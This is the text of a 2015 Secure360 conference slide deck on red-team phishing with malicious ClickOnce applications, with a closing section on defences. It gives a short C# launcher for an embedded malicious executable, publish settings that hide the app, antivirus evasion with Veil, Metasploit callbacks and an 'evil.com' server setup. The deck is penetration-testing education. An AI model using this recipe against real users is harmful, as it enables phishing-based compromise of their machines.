SlideShare a Scribd company logo
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
All You Need Is One - A ClickOnce
Love Story
Ryan Gandrud
Cody Wass
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Introduction
• Ryan Gandrud
– Penetration tester
– Computer enthusiast
• Cody Wass
– Web applications
– Scotch aficionado
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Overview
• ClickOnce?
• Phishing-phriendly pheatures
• Creating a malicious ClickOnce application
• Phishing setup
• Issues and pitfalls
• Demo
• Prevention
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce WTF?
• ClickOnce – What is it?
– ClickOnce is a wrapper that sits
around a Windows executable to
“install” it on a machine
– Used by application administrators to
deploy installations to users in the
network
– Supports multiple deployment methods
(web, network share, local execution)
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Internals
• ProjectName.application
– Contains the location of the manifest and application version
information
• ProjectName.exe.config.deploy
– Contains application settings (i.e. connection strings, etc.)
• ProjectName.exe.deploy
– The (potentially malicious) executable that will be run by a user
• ProjectName.exe.manifest
– Manifest file containing application version, .NET versions
supported, permission level requested, and signatures for the
other files
– Contains the file name for the executable
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Certificate Signing
• ClickOnce and .NET support signing applications
• Authenticode – Microsoft cert-based signing technology used
to verify the authenticity of publisher
• Need to “acquire” an code-signing Authenticode certificate
from a Certificate Authority (CA)
• Signing stages available
– Signed (CA)
– Self-signed (MakeCert.exe in .NET)
– Unsigned (No cert used)
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Trust Architecture
• Applications and how they are executed are based on a trust
architecture separated into different execution source zones
• ClickOnce allows permitted applications to elevate privileges
automatically (Trusted Sites) or through prompting the user
• Prompting levels are controlled by the following registry key
– HKEY_LOCAL_MACHINESOFTWAREMICROSOFT.NETFra
meworkSecurityTrustManagerPromptingLevel
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Trust Architecture (cont.)
• These are features: "But the most important new feature
when it comes to security is … the end user can elevate
permissions without the help of an administrator“
• “If the application permissions don't exceed policy
permissions, the application downloads and runs without
asking the user any trust questions.”
• “If the application needs more permissions than what's
granted by policy, the user is asked if he wants to trust that
application and elevate permissions... If the user clicks Run,
the application is put into the Application Trust List and is
downloaded and started.”
MSDN:https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Trust Architecture (cont.)
• When ClickOnce was originally being developed in .NET 2.0
Beta 2, permissions looked promising with the Internet zone
being restricted to applications signed by a valid certificate.
Zone Applications
My Computer Enabled
Local Intranet Enabled
Trusted Sites Enabled
Internet Enabled for signed apps
Untrusted Sites Disabled
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Trust Architecture (cont.)
• Unfortunately, Microsoft decided to change this, specifically
the Internet zone, and not for the best
• Now, by default, ClickOnce packages that come from the
Internet allow a user to grant the application temporary
admin privileges in order to install
Zone Applications
My Computer Enabled
Local Intranet Enabled
Trusted Sites Enabled
Internet Enabled
Untrusted Sites Disabled
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Owning With a Click
• Why use ClickOnce application?
– ClickOnce is supported on all modern Windows operating
systems since it relies on .NET
– All distributions come with at least .NET 2.0 since Windows
Server 2k3
– .NET supports backwards compatibility
– Dead simple to write
– Public browser exploits are highly version specific and
more often than not, crash the victim’s browser
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Owning With a Click (cont.)
• Originally meant to be deployed using Windows Internet
Explorer
– ClickOnce is supported by IE 6.0+
– Now supported by Firefox and Chrome using third party
addons (.NET 3.5+)
• Minimizes user interaction
• Delivering malicious code through multiple options
– It’s a .NET project – write your own
– Include malicious executable as a resource
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Payloads
• Roll your own payload
– Our original vector
– Flagged by AV
• Standard Metasploit payload
– Also attempted
– Reverse_HTTPS returned broken shells
• Assumed due to AV or something inline during delivery of second
Meterpreter stage
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Payloads (cont.)
• Powershell
– Justin@sixdub did a great write-up on using Powershell
commands instead of an executable for a Meterpreter
callback with ClickOnce
– Pros:
• Powershell command runs in memory – never touches disk
– Cons:
• Difficulty in changing payloads
• ClickOnce is already on disk
http://www.sixdub.net/?p=555
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Payloads (cont.)
• Veil
– Pros:
• Payloads written in different languages
• Encrypted Payloads – less likely to get caught by AV
– Cons:
• Static “random” Meterpreter callback
• This is an issue with how Metasploit handles stagers
– Will be fixed (hopefully) soon
• We decided to go with Veil since we to avoid AV detection
during our Red Team engagement
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Payloads (cont.)
• Problem:
– Static Meterpreter callbacks from targets
• Solution?:
– Dynamically generating individualized Veil
payloads
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application
• Visual Studio is used to create ClickOnce
applications
– The free edition of Visual Studio 2013 supports
ClickOnce publishing
• Start a new console application project within
Visual Studio
– No GUI popup during execution
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• Using C# in .NET, create a new process that
launches your included executable
(ClickOnceInc.exe)
static class Program
{
static void Main()
{
//Starting a new process executing the malicious exe
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = false;
p.StartInfo.FileName = "ClickOnceInc.exe";
p.Start();
}
}
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• Ensure that your application uses the correct
version of .NET so the application runs
properly.
• Here, .NET 3.5 was chosen by navigating to
the Application tab on the left, and selecting
the Target Framework from the dropdown.
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• Include your malicious binary into the project
by clicking and dragging it over your Solution
Explorer
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• In the Properties of the application under Publish:
– Ensure the Install Mode is set to “available online only”
• This prevents the application from showing up in the
Start Menu
– Clicking the Application Files… button
• Exclude the hash for the ClickOnceInc.exe
– Dynamic payload generation changes the hash
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• Clicking the Publish button, follow the wizard
to publish the ClickOnce application to your
local drive
• There should be multiple files/directories
– Application Files directory
– Evil Survey.application
– Publish.htm
– Setup.exe
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Server Setup
• Web server with ClickOnce-specific directories
– Kali with Veil, Metasploit, and Apache
• Apache mod_rewrite
– GET evil.com?u={ID} ->
evil.com/{ID}/evil.application
– Combined with dynamic Veil payloads, allowed
easy analytics and post-mortem data gathering.
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Callback Listener
• Our solution:
– Metasploit listener
• Phishing scenario – targets are workstations
• Most likely have outbound http access
• Limited window of engagement
• Egress filtering
– ssh / icmp / dns tunneling
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Pitfalls
• Outdated packages / dependencies
– Veil, Python, Wine.
• Signing restrictions
– No signing allowed with dynamic payloads
• No easy way to use mage.exe on linux
– Self-signed certs are only marginally better
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Cleanup
• ClickOnce install directory:
– %LOCALAPPDATA%Apps2.0{machine-
specific}{machine-specific}{obfuscated-app-
name}
• C:UsersBobAppDataLocalApps2.0F3RBL2XD.32Y
Z3R2E8LL.92S{app-folder}
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Cleanup
• Add/Remove Programs
• Delete relevant AppData folder
• Nuke everything:
– Note: This will clear the entire online application
cache.
– No need for elevated privileges, AppCaches are
user-specific.
rundll32 dfshim CleanOnlineAppCache
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Demo
• Client:
– Windows 7
• Server (evil.com):
– Kali running Apache to serve file
– Metasploit listener running to catch callback
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
• Typical Anti-Phishing Techniques
– User education
• Users continue through “… a quarter of Google
Chrome’s malware and phishing warnings”
– Endpoint protection
• Signatures lag behind usage
• Heuristics require a practical balance
• Limited usefulness for other phishing-based vectors
– Least privileged configurations
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
• ClickOnce-Specific Techniques
– Code Access Security
• ClickOnce applications can specify a “permissions level”
• Default: Full Trust – Requires prompt for elevation
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
• Disabling Trust Prompt
– HKEY_LOCAL_MACHINESOFTWAREMICROSOFT.NETFra
meworkSecurityTrustManagerPromptingLevel
– Trust prompt is controlled by zone
• Untrusted Sites
• Internet
• My Computer
• Local Intranet
• Trusted Sites
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
String Value subkey Value
Internet Enabled
UntrustedSites Disabled
MyComputer Enabled
LocalIntranet Enabled
TrustedSites Enabled
Option Registry setting value
Enable the trust prompt. Enabled
Restrict the trust prompt. AuthenticodeRequired
Disable the trust prompt. Disabled
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
• Windows 8
– SmartScreen Filter
• Enabled by default
• Adds another layer after user clicks ‘run’ for anything
not signed by a recognized CA
• Default ‘OK’ action results in application not running
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Flowchart by Robin Shahan (@robindotnet)
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
Questions?
Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
More Information / References
• Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness
– Devdatta Akhawe University of California, Berkeley, devdatta@cs.berkeley.edu
– Adrienne Porter Felt Google, Inc, felt@google.com
• http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/
• https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
• https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx
• https://msdn.microsoft.com/en-us/library/ee308453.aspx
• https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive-
answer-2/
• https://blog.netspi.com/bypassing-av-with-veil-evasion/
• https://github.com/rapid7/metasploit-framework/issues/4895
• http://www.sixdub.net/?p=555
• https://blog.netspi.com/

More Related Content

What's hot

Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
 
NGSIv2 Overview for Developers That Already Know NGSIv1
NGSIv2 Overview for Developers That Already Know NGSIv1NGSIv2 Overview for Developers That Already Know NGSIv1
NGSIv2 Overview for Developers That Already Know NGSIv1
Fermin Galan
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Everything you want to know about Ingress
Everything you want to know about IngressEverything you want to know about Ingress
Everything you want to know about Ingress
Janakiram MSV
 
JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
snyff
 
Serverless - When to FaaS?
Serverless - When to FaaS?Serverless - When to FaaS?
Serverless - When to FaaS?
Benny Bauer
 
Android pentesting the hackers-meetup
Android pentesting the hackers-meetupAndroid pentesting the hackers-meetup
Android pentesting the hackers-meetup
kunwaratul hax0r
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
42Crunch
 
Overview of secret management solutions and architecture
Overview of secret management solutions and architectureOverview of secret management solutions and architecture
Overview of secret management solutions and architecture
Yuechuan (Mike) Chen
 
Securing Your API
Securing Your APISecuring Your API
Securing Your API
Jason Austin
 
Cloud Native Identity with SPIFFE
Cloud Native Identity with SPIFFECloud Native Identity with SPIFFE
Cloud Native Identity with SPIFFE
Prabath Siriwardena
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Romansh Yadav
 
PURL and vers: The Mostly Universal Package URL and Version Ranges Identifier...
PURL and vers: The Mostly Universal Package URL and Version Ranges Identifier...PURL and vers: The Mostly Universal Package URL and Version Ranges Identifier...
PURL and vers: The Mostly Universal Package URL and Version Ranges Identifier...
Michael Herzog
 
[JWPA-1]의존성 주입(Dependency injection)
[JWPA-1]의존성 주입(Dependency injection)[JWPA-1]의존성 주입(Dependency injection)
[JWPA-1]의존성 주입(Dependency injection)
Young-Ho Cho
 
Managing secrets at scale
Managing secrets at scaleManaging secrets at scale
Managing secrets at scale
Alex Schoof
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Nick Stephens-how does someone unlock your phone with nose
Nick Stephens-how does someone unlock your phone with noseNick Stephens-how does someone unlock your phone with nose
Nick Stephens-how does someone unlock your phone with nose
GeekPwn Keen
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 

What's hot (20)

Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
NGSIv2 Overview for Developers That Already Know NGSIv1
NGSIv2 Overview for Developers That Already Know NGSIv1NGSIv2 Overview for Developers That Already Know NGSIv1
NGSIv2 Overview for Developers That Already Know NGSIv1
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Everything you want to know about Ingress
Everything you want to know about IngressEverything you want to know about Ingress
Everything you want to know about Ingress
 
JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
 
Serverless - When to FaaS?
Serverless - When to FaaS?Serverless - When to FaaS?
Serverless - When to FaaS?
 
Android pentesting the hackers-meetup
Android pentesting the hackers-meetupAndroid pentesting the hackers-meetup
Android pentesting the hackers-meetup
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
Overview of secret management solutions and architecture
Overview of secret management solutions and architectureOverview of secret management solutions and architecture
Overview of secret management solutions and architecture
 
Securing Your API
Securing Your APISecuring Your API
Securing Your API
 
Cloud Native Identity with SPIFFE
Cloud Native Identity with SPIFFECloud Native Identity with SPIFFE
Cloud Native Identity with SPIFFE
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
 
PURL and vers: The Mostly Universal Package URL and Version Ranges Identifier...
PURL and vers: The Mostly Universal Package URL and Version Ranges Identifier...PURL and vers: The Mostly Universal Package URL and Version Ranges Identifier...
PURL and vers: The Mostly Universal Package URL and Version Ranges Identifier...
 
[JWPA-1]의존성 주입(Dependency injection)
[JWPA-1]의존성 주입(Dependency injection)[JWPA-1]의존성 주입(Dependency injection)
[JWPA-1]의존성 주입(Dependency injection)
 
Managing secrets at scale
Managing secrets at scaleManaging secrets at scale
Managing secrets at scale
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Nick Stephens-how does someone unlock your phone with nose
Nick Stephens-how does someone unlock your phone with noseNick Stephens-how does someone unlock your phone with nose
Nick Stephens-how does someone unlock your phone with nose
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
 

Viewers also liked

Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From Windows
NetSPI
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
NetSPI
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
NetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox Testing
NetSPI
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration Testing
NetSPI
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
NetSPI
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
NetSPI
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
NetSPI
 
Thick client application security assessment
Thick client  application security assessmentThick client  application security assessment
Thick client application security assessment
Sanjay Kumar (Seeking options outside India)
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
NetSPI
 

Viewers also liked (11)

Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From Windows
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox Testing
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration Testing
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
 
Thick client application security assessment
Thick client  application security assessmentThick client  application security assessment
Thick client application security assessment
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 

Similar to All You Need is One - A ClickOnce Love Story - Secure360 2015

VMWare Tech Talk: "The Road from Rugged DevOps to Security Chaos Engineering"
VMWare Tech Talk: "The Road from Rugged DevOps to Security Chaos Engineering"VMWare Tech Talk: "The Road from Rugged DevOps to Security Chaos Engineering"
VMWare Tech Talk: "The Road from Rugged DevOps to Security Chaos Engineering"
Aaron Rinehart
 
Cyber security - It starts with the embedded system
Cyber security - It starts with the embedded systemCyber security - It starts with the embedded system
Cyber security - It starts with the embedded system
Rogue Wave Software
 
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021
Teemu Tiainen
 
SPI Dynamics web application security 101
SPI Dynamics web application security 101 SPI Dynamics web application security 101
SPI Dynamics web application security 101
Wade Malone
 
Securing Android
Securing AndroidSecuring Android
Securing Android
Marakana Inc.
 
Ransomware: Mitigation Through Preparation
Ransomware: Mitigation Through PreparationRansomware: Mitigation Through Preparation
Ransomware: Mitigation Through Preparation
Hostway|HOSTING
 
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Qualcomm Developer Network
 
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja WarriorsRyan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
Lalit Kale
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Application
edavid2685
 
SCS DevSecOps Seminar - State of DevSecOps
SCS DevSecOps Seminar - State of DevSecOpsSCS DevSecOps Seminar - State of DevSecOps
SCS DevSecOps Seminar - State of DevSecOps
Stefan Streichsbier
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...
Cenzic
 
Hardware Security on Vehicles
Hardware Security on VehiclesHardware Security on Vehicles
Hardware Security on Vehicles
Priyanka Aash
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021
lior mazor
 
The End of Security as We Know It - Shannon Lietz
The End of Security as We Know It - Shannon LietzThe End of Security as We Know It - Shannon Lietz
The End of Security as We Know It - Shannon Lietz
SeniorStoryteller
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source Software
MyNOG
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
lior mazor
 
Andrew Useckas Csa presentation hacking custom webapps 4 3
Andrew Useckas Csa presentation   hacking custom webapps 4 3Andrew Useckas Csa presentation   hacking custom webapps 4 3
Andrew Useckas Csa presentation hacking custom webapps 4 3
Trish McGinity, CCSK
 
AusCERT - Developing Secure iOS Applications
AusCERT - Developing Secure iOS ApplicationsAusCERT - Developing Secure iOS Applications
AusCERT - Developing Secure iOS Applications
eightbit
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
Sebastien Deleersnyder
 

Similar to All You Need is One - A ClickOnce Love Story - Secure360 2015 (20)

VMWare Tech Talk: "The Road from Rugged DevOps to Security Chaos Engineering"
VMWare Tech Talk: "The Road from Rugged DevOps to Security Chaos Engineering"VMWare Tech Talk: "The Road from Rugged DevOps to Security Chaos Engineering"
VMWare Tech Talk: "The Road from Rugged DevOps to Security Chaos Engineering"
 
Cyber security - It starts with the embedded system
Cyber security - It starts with the embedded systemCyber security - It starts with the embedded system
Cyber security - It starts with the embedded system
 
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021
 
SPI Dynamics web application security 101
SPI Dynamics web application security 101 SPI Dynamics web application security 101
SPI Dynamics web application security 101
 
Securing Android
Securing AndroidSecuring Android
Securing Android
 
Ransomware: Mitigation Through Preparation
Ransomware: Mitigation Through PreparationRansomware: Mitigation Through Preparation
Ransomware: Mitigation Through Preparation
 
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
 
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja WarriorsRyan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Application
 
SCS DevSecOps Seminar - State of DevSecOps
SCS DevSecOps Seminar - State of DevSecOpsSCS DevSecOps Seminar - State of DevSecOps
SCS DevSecOps Seminar - State of DevSecOps
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...
 
Hardware Security on Vehicles
Hardware Security on VehiclesHardware Security on Vehicles
Hardware Security on Vehicles
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021
 
The End of Security as We Know It - Shannon Lietz
The End of Security as We Know It - Shannon LietzThe End of Security as We Know It - Shannon Lietz
The End of Security as We Know It - Shannon Lietz
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source Software
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
 
Andrew Useckas Csa presentation hacking custom webapps 4 3
